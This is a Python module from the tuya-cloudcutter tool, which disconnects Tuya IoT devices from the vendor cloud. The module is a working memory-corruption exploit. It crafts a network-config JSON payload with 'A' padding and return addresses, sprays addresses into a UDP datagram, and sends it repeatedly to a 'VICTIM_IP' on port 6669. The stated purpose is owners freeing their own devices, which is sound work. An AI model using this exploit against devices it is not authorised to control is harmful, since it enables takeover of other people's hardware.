tuya-cloudcutter

A tool that disconnects Tuya IoT devices from the cloud, allowing them to run completely locally.

import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict

from .device import DeviceConfig

MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8

VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669

LOCAL_KEY_LENGTH = 16
SEC_KEY_LENGTH = 16
DEVICE_ID_LENGTH = 20
PSK_LENGTH = 32


def build_network_config_packet(payload):
    if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
        raise ValueError('Payload is too long!')
    # NOTE
    # fr_num and crc do not seem to be used in the disas
    # calculating them anyway - in case it's needed
    # for some reason.
    tail_len = 8
    head, tail = 0x55aa, 0xaa55
    fr_num, fr_type = 0, 0x1
    plen = len(payload) + tail_len
    buffer = struct.pack("!IIII", head, fr_num, fr_type, plen)
    buffer += payload
    crc = zlib.crc32(buffer)
    buffer += struct.pack("!II", crc, tail)
    return buffer


def send_network_config_datagram(datagram):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.sendto(datagram, (VICTIM_IP, VICTIM_PORT))


def encode_json_val(value):
    encoded = []
    escaped = list(map(ord, '"\\'))
    escape_char = ord('\\')
    for i in value:
        if i in escaped:
            encoded.append(escape_char)
        encoded.append(i)
    return bytes(encoded)


def check_valid_payload(value):
    def eq_zero(x): return x == 0
    if any(map(eq_zero, value)):
        raise ValueError('At least one null byte detected in payload!')
    return value


def generate_random_ascii_string(length):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))


def create_device_specific_config(args, combined, uuid, auth_key, psk_key = None) -> DeviceConfig:
    config = DeviceConfig({})

    config.set(DeviceConfig.UUID, uuid)
    config.set(DeviceConfig.AUTH_KEY, auth_key)
    config.set(DeviceConfig.LOCAL_KEY, generate_random_ascii_string(LOCAL_KEY_LENGTH) if len(args.local_key) == 0 else args.local_key)
    config.set(DeviceConfig.SEC_KEY, generate_random_ascii_string(SEC_KEY_LENGTH))
    config.set(DeviceConfig.DEVICE_ID, generate_random_ascii_string(DEVICE_ID_LENGTH) if len(args.device_id) == 0 else args.device_id)
    config.set(DeviceConfig.CHIP_FAMILY, combined["profile"]['firmware']['chip'].upper())
    config.set(DeviceConfig.PROFILE, combined["profile"]["name"] + " / " + combined["profile"]["sub_name"])
    config.set(DeviceConfig.DEVICE, combined['slug'])
    if psk_key is not None:
        config.set(DeviceConfig.PSK, psk_key)

    return config


def exploit_device_with_config(args, combined: Dict) -> DeviceConfig:

    data = combined["profile"]["data"]
    address_finish = int(data.get("address_finish", "0"), 0)
    address_finish = address_finish.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
    address_ssid = int(data.get("address_ssid", "0"), 0)
    address_ssid = address_ssid.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
    address_ssid_padding = int(data.get("address_ssid_padding", 4))
    address_passwd = int(data.get("address_passwd", "0"), 0)
    address_passwd = address_passwd.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
    address_datagram = int(data.get("address_datagram", "0"), 0)
    address_datagram = address_datagram.to_bytes(byteorder="little", length=4)

    uuid = generate_random_ascii_string(12)
    auth_key = generate_random_ascii_string(16)

    payload = {
        "auzkey": auth_key,
        "uuid": uuid,
        "pskKey": "",
        "prod_test": False,
        "ap_ssid": "A",
        "ssid": "A",
        "token": b"A" * 72 + address_finish,
    }

    if address_ssid:
        padding = 4
        if address_ssid_padding:
            padding = address_ssid_padding
        payload["ssid"] = b"A" * padding + address_ssid
    if address_passwd:
        payload["passwd"] = address_passwd

    payload = {
        k: b'"' + v + b'"'
        if isinstance(v, bytes)
        else b'true'
        if v == True
        else b'false'
        if v == False
        else b'"' + v.encode() + b'"'
        for k, v in payload.items()
    }
    payload = [f'"{k}":'.encode() + v for k, v in payload.items()]
    payload = b"{" + b",".join(payload) + b"}"

    payload = check_valid_payload(payload)
    datagram = build_network_config_packet(payload)

    if address_datagram:
        pad_length = 256 - len(datagram)
        datagram += b"A" * (pad_length % 4)
        datagram += address_datagram * int(pad_length / 4)
        assert len(datagram) == 256

    for _ in range(5):
        send_network_config_datagram(datagram)
        time.sleep(.200)

    return create_device_specific_config(args, combined, uuid, auth_key)